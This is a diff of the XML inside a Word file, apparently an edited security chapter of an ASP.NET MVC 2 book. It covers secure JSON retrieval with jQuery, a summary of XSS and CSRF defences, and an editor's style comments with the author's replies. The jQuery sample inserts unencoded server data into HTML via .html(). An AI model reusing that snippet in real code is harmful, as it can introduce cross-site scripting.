+        <w:t>Consuming SecureJsonResult with jQuery</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="26"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
@@ -5392,215 +3954,86 @@
           <w:vanish/>
           <w:color w:val="000000"/>
         </w:rPr>
-        <w:commentReference w:id="18"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>$(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>function</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>() {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>$.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>getJSON</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>('/post/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>getsecurejson</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">', </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>function</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(data) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> options = '';</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>for</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = 0; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> &lt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>data.d.length</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>++) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>options</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> += '&lt;option value="' +</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>data.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">].Id + '"&gt;' + </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>data.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>].Title +</w:t>
+        <w:commentReference w:id="26"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>$(function() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">$.getJSON('/post/getsecurejson', </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>function(data) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>var options = '';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>for (var i = 0; i &lt; data.d.length; i++) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>options += '&lt;option value="' +</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>data.d[i].Id + '"&gt;' + data.d[i].Title +</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  #1</w:t>
@@ -5642,15 +4075,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>$('#</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>secure'</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>).html(options);</w:t>
+        <w:t>$('#secure').html(options);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5675,15 +4100,7 @@
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">#1 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Using</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> the d variable</w:t>
+        <w:t>#1 Using the d variable</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5691,15 +4108,7 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Using this technique we can still use </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>GETs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to retrieve our JSON data, but the JSON is secure because it is never just an array - any arrays are wrapped in a "d" variable.  But we must be sure to access values through the "d" variable </w:t>
+        <w:t xml:space="preserve">Using this technique we can still use GETs to retrieve our JSON data, but the JSON is secure because it is never just an array - any arrays are wrapped in a "d" variable.  But we must be sure to access values through the "d" variable </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5710,22 +4119,31 @@
       <w:r>
         <w:t>.  This unconventional code can be confusing.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:commentRangeStart w:id="19"/>
-      <w:r>
-        <w:t>We recommend using the default behavior of using HTTP POST request to retrieve JSON data.  If that becomes a problem, developers can choose to switch to another technique.</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="19"/>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="27"/>
+      <w:commentRangeStart w:id="28"/>
+      <w:r>
+        <w:t xml:space="preserve">We recommend using the default behavior of using HTTP POST request to retrieve JSON data.  If that becomes a problem, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">you can switch to this </w:t>
+      </w:r>
+      <w:r>
+        <w:t>technique.</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="27"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="19"/>
+        <w:commentReference w:id="27"/>
+      </w:r>
+      <w:commentRangeEnd w:id="28"/>
+      <w:r>
+        <w:commentReference w:id="28"/>
       </w:r>
     </w:p>
     <w:p>
@@ -5743,87 +4161,78 @@
       <w:r>
         <w:t xml:space="preserve">No application can ever be totally secure, but in this chapter we learned about several vulnerabilities, and how we can protect our ASP.NET MVC 2 applications.  </w:t>
       </w:r>
-      <w:commentRangeStart w:id="20"/>
+      <w:commentRangeStart w:id="29"/>
       <w:r>
         <w:t xml:space="preserve">We explored using </w:t>
       </w:r>
-      <w:commentRangeEnd w:id="20"/>
+      <w:commentRangeEnd w:id="29"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="20"/>
+        <w:lastRenderedPageBreak/>
+        <w:commentReference w:id="29"/>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">the </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to enforce authentication and authorization on actions.  We understood </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>cross site</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> scripting and learned to never trust user input and </w:t>
-      </w:r>
-      <w:commentRangeStart w:id="21"/>
-      <w:r>
-        <w:t xml:space="preserve">HTML encode all output.  </w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="21"/>
+      <w:r>
+        <w:t xml:space="preserve"> to enforce authentication and authorization on actions.  We understood cross site scripting and learned to never trust user input and </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="30"/>
+      <w:r>
+        <w:t xml:space="preserve">HTML </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">encode all </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="31"/>
+      <w:r>
+        <w:t xml:space="preserve">output.  </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="30"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CommentReference"/>
           <w:vanish/>
         </w:rPr>
-        <w:commentReference w:id="21"/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Cross site</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> request forgeries are neutered when the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:commentReference w:id="30"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Cross site request forgeries are neutered when the </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>ValidateAntiForgerTokenAttribute</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> is used to verify that input is coming from trusted forms.  We learned how ASP.NET MVC 2 helps protect against JSON hijacking and how to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>explicity</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> work-around the changes to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t xml:space="preserve"> is used to verify that input is coming from trusted </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="31"/>
+      <w:r>
+        <w:commentReference w:id="31"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">forms.  We learned how ASP.NET MVC 2 helps protect against JSON hijacking and how to explicity work-around the changes to </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>JsonResult</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -5846,7 +4255,7 @@
         <w:numRestart w:val="eachSect"/>
       </w:footnotePr>
       <w:pgSz w:w="10627" w:h="13320" w:code="13"/>
-      <w:pgMar w:top="1800" w:right="1080" w:bottom="1080" w:left="1987" w:gutter="0"/>
+      <w:pgMar w:top="1800" w:right="1080" w:bottom="1080" w:left="1987" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgNumType w:start="1" w:chapSep="period"/>
       <w:cols w:space="0"/>
       <w:noEndnote/>
@@ -5857,7 +4266,7 @@
 </file>
 
 <file path=word/comments.xml><?xml version="1.0" encoding="utf-8"?>
-<w:comments xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:comments xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:comment w:id="0" w:author="Katharine Osborne" w:date="2010-02-06T23:18:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
@@ -5887,7 +4296,7 @@
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="1" w:author="Katharine Osborne" w:date="2010-02-06T23:20:00Z" w:initials="KO">
+  <w:comment w:id="1" w:author="Katharine Osborne" w:date="2010-02-06T23:24:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -5899,36 +4308,17 @@
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>This is bland and obvious. Is there any way to spice this up? Why is it so important?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Ideally, thesis statements should pack a punch that will hook readers into the chapter.</w:t>
+        <w:t>Is the user authenticated or the username and password? If the former then, “he is authenticated” or “the user is authenticated”. If the latter, the “they are authenticated”.</w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="2" w:author="Katharine Osborne" w:date="2010-02-06T23:24:00Z" w:initials="KO">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
+  <w:comment w:id="2" w:author="Jeffrey" w:date="2010-02-18T15:45:00Z" w:initials="J">
+    <w:p>
+      <w:r>
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>Is the user authenticated or the username and password? If the former then, “he is authenticated” or “the user is authenticated”. If the latter, the “they are authenticated”.</w:t>
+        <w:t>Fixed it using the singular, form, "he".</w:t>
       </w:r>
     </w:p>
   </w:comment>
@@ -5944,19 +4334,21 @@
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Here “it” again refers to the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> user. I assume this was meant to be the resource instead. Rewrite for proper agreement.</w:t>
+        <w:t>Here “it” again refers to the the user. I assume this was meant to be the resource instead. Rewrite for proper agreement.</w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="4" w:author="Katharine Osborne" w:date="2010-02-06T23:26:00Z" w:initials="KO">
+  <w:comment w:id="4" w:author="Jeffrey" w:date="2010-02-18T15:46:00Z" w:initials="J">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Fixed it</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="5" w:author="Katharine Osborne" w:date="2010-02-06T23:26:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -5972,7 +4364,7 @@
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="5" w:author="Katharine Osborne" w:date="2010-02-06T23:38:00Z" w:initials="KO">
+  <w:comment w:id="6" w:author="Katharine Osborne" w:date="2010-02-06T23:38:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6001,7 +4393,17 @@
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="6" w:author="Katharine Osborne" w:date="2010-02-06T23:39:00Z" w:initials="KO">
+  <w:comment w:id="7" w:author="Jeffrey" w:date="2010-02-18T15:55:00Z" w:initials="J">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>I added a sentence above refering to Chapter 9 where filters were covered in detail.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="8" w:author="Katharine Osborne" w:date="2010-02-06T23:39:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6017,7 +4419,17 @@
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="7" w:author="Katharine Osborne" w:date="2010-02-06T23:40:00Z" w:initials="KO">
+  <w:comment w:id="9" w:author="Jeffrey" w:date="2010-02-18T15:56:00Z" w:initials="J">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>It should be hyphenated</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="10" w:author="Katharine Osborne" w:date="2010-02-06T23:40:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6029,27 +4441,24 @@
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Dashes used to show a pause should be </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>em</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> dashes (type the dash character twice to get an </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>em</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> dash in Word). Just FYI.</w:t>
+        <w:t>Dashes used to show a pause should be em dashes (type the dash character twice to get an em dash in Word). Just FYI.</w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="8" w:author="Katharine Osborne" w:date="2010-02-06T23:42:00Z" w:initials="KO">
+  <w:comment w:id="11" w:author="Jeffrey" w:date="2010-02-18T15:58:00Z" w:initials="J">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Tried it.  I need help </w:t>
+      </w:r>
+      <w:r>
+        <w:sym w:font="Wingdings" w:char="F04C"/>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="12" w:author="Katharine Osborne" w:date="2010-02-06T23:42:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6065,7 +4474,17 @@
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="9" w:author="Katharine Osborne" w:date="2010-02-06T23:46:00Z" w:initials="KO">
+  <w:comment w:id="13" w:author="Jeffrey" w:date="2010-02-18T16:00:00Z" w:initials="J">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Yes, the reader will already know.  Some of our readers will likely always use F5 as well.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="14" w:author="Katharine Osborne" w:date="2010-02-06T23:46:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6081,7 +4500,7 @@
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="10" w:author="Katharine Osborne" w:date="2010-02-06T23:47:00Z" w:initials="KO">
+  <w:comment w:id="15" w:author="Katharine Osborne" w:date="2010-02-06T23:47:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6097,7 +4516,17 @@
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="11" w:author="Katharine Osborne" w:date="2010-02-06T23:48:00Z" w:initials="KO">
+  <w:comment w:id="16" w:author="Jeffrey" w:date="2010-02-18T16:01:00Z" w:initials="J">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>We'll do a URL sweep before typesetting.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="17" w:author="Katharine Osborne" w:date="2010-02-06T23:51:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6109,11 +4538,14 @@
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>This doesn’t seem right. Third-level section headings shouldn’t have numbering.</w:t>
+        <w:t xml:space="preserve">Love it! Very apt metaphor </w:t>
+      </w:r>
+      <w:r>
+        <w:sym w:font="Wingdings" w:char="F04A"/>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="12" w:author="Katharine Osborne" w:date="2010-02-06T23:51:00Z" w:initials="KO">
+  <w:comment w:id="18" w:author="Katharine Osborne" w:date="2010-02-06T23:52:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6125,14 +4557,21 @@
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Love it! Very apt metaphor </w:t>
-      </w:r>
-      <w:r>
-        <w:sym w:font="Wingdings" w:char="F04A"/>
+        <w:t>Does this need to be it’s own paragraph?</w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="13" w:author="Katharine Osborne" w:date="2010-02-06T23:51:00Z" w:initials="KO">
+  <w:comment w:id="19" w:author="Jeffrey" w:date="2010-02-18T16:03:00Z" w:initials="J">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>No.  I changed it.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="20" w:author="Katharine Osborne" w:date="2010-02-18T16:04:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6144,11 +4583,34 @@
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>Can this be a bit more descriptive?</w:t>
+        <w:t>This needs to be a bit more descriptive. What about, “Using Html.AntiForgeryToken()”?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">It may seem a bit nitpicky, but it’s part of Manning’s style to start code listing titles with a verb (or at least be a bit more descriptive than one word). The idea is to emphasize the fact that the user can do something with the listing. </w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="14" w:author="Katharine Osborne" w:date="2010-02-06T23:52:00Z" w:initials="KO">
+  <w:comment w:id="21" w:author="Jeffrey" w:date="2010-02-18T16:04:00Z" w:initials="J">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Changed it.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="22" w:author="Katharine Osborne" w:date="2010-02-06T23:57:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6160,11 +4622,21 @@
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t>Does this need to be it’s own paragraph?</w:t>
+        <w:t>Make sure all the code listing titles are more descriptive.</w:t>
       </w:r>
     </w:p>
   </w:comment>
-  <w:comment w:id="15" w:author="Katharine Osborne" w:date="2010-02-06T23:54:00Z" w:initials="KO">
+  <w:comment w:id="23" w:author="Jeffrey" w:date="2010-02-18T16:05:00Z" w:initials="J">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>done</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="24" w:author="Katharine Osborne" w:date="2010-02-06T23:57:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
@@ -6176,37 +4648,63 @@
         <w:annotationRef/>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">This needs to be a bit more descriptive. What about, “Using </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Html.AntiForgeryToken</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>)”?</w:t>
-      </w:r>
-    </w:p>
+        <w:t>There’s a lot going on in the listing above. Does this need a bit more explanation?</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="25" w:author="Jeffrey" w:date="2010-02-18T16:08:00Z" w:initials="J">
+    <w:p>
+      <w:r>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Added another sentence</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="26" w:author="Katharine Osborne" w:date="2010-02-06T23:58:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
       </w:pPr>
-    </w:p>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>This is a much better listing title.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="27" w:author="Katharine Osborne" w:date="2010-02-06T23:58:00Z" w:initials="KO">
     <w:p>
       <w:pPr>
         <w:pStyle w:val="CommentText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">It may seem a bit nitpicky, but it’s part of Manning’s style to start code listing titles with a verb (or at least be a bit more descriptive than one word). The idea is to emphasize the fact that the user can do something with the listing. </w:t>
+        <w:rPr>
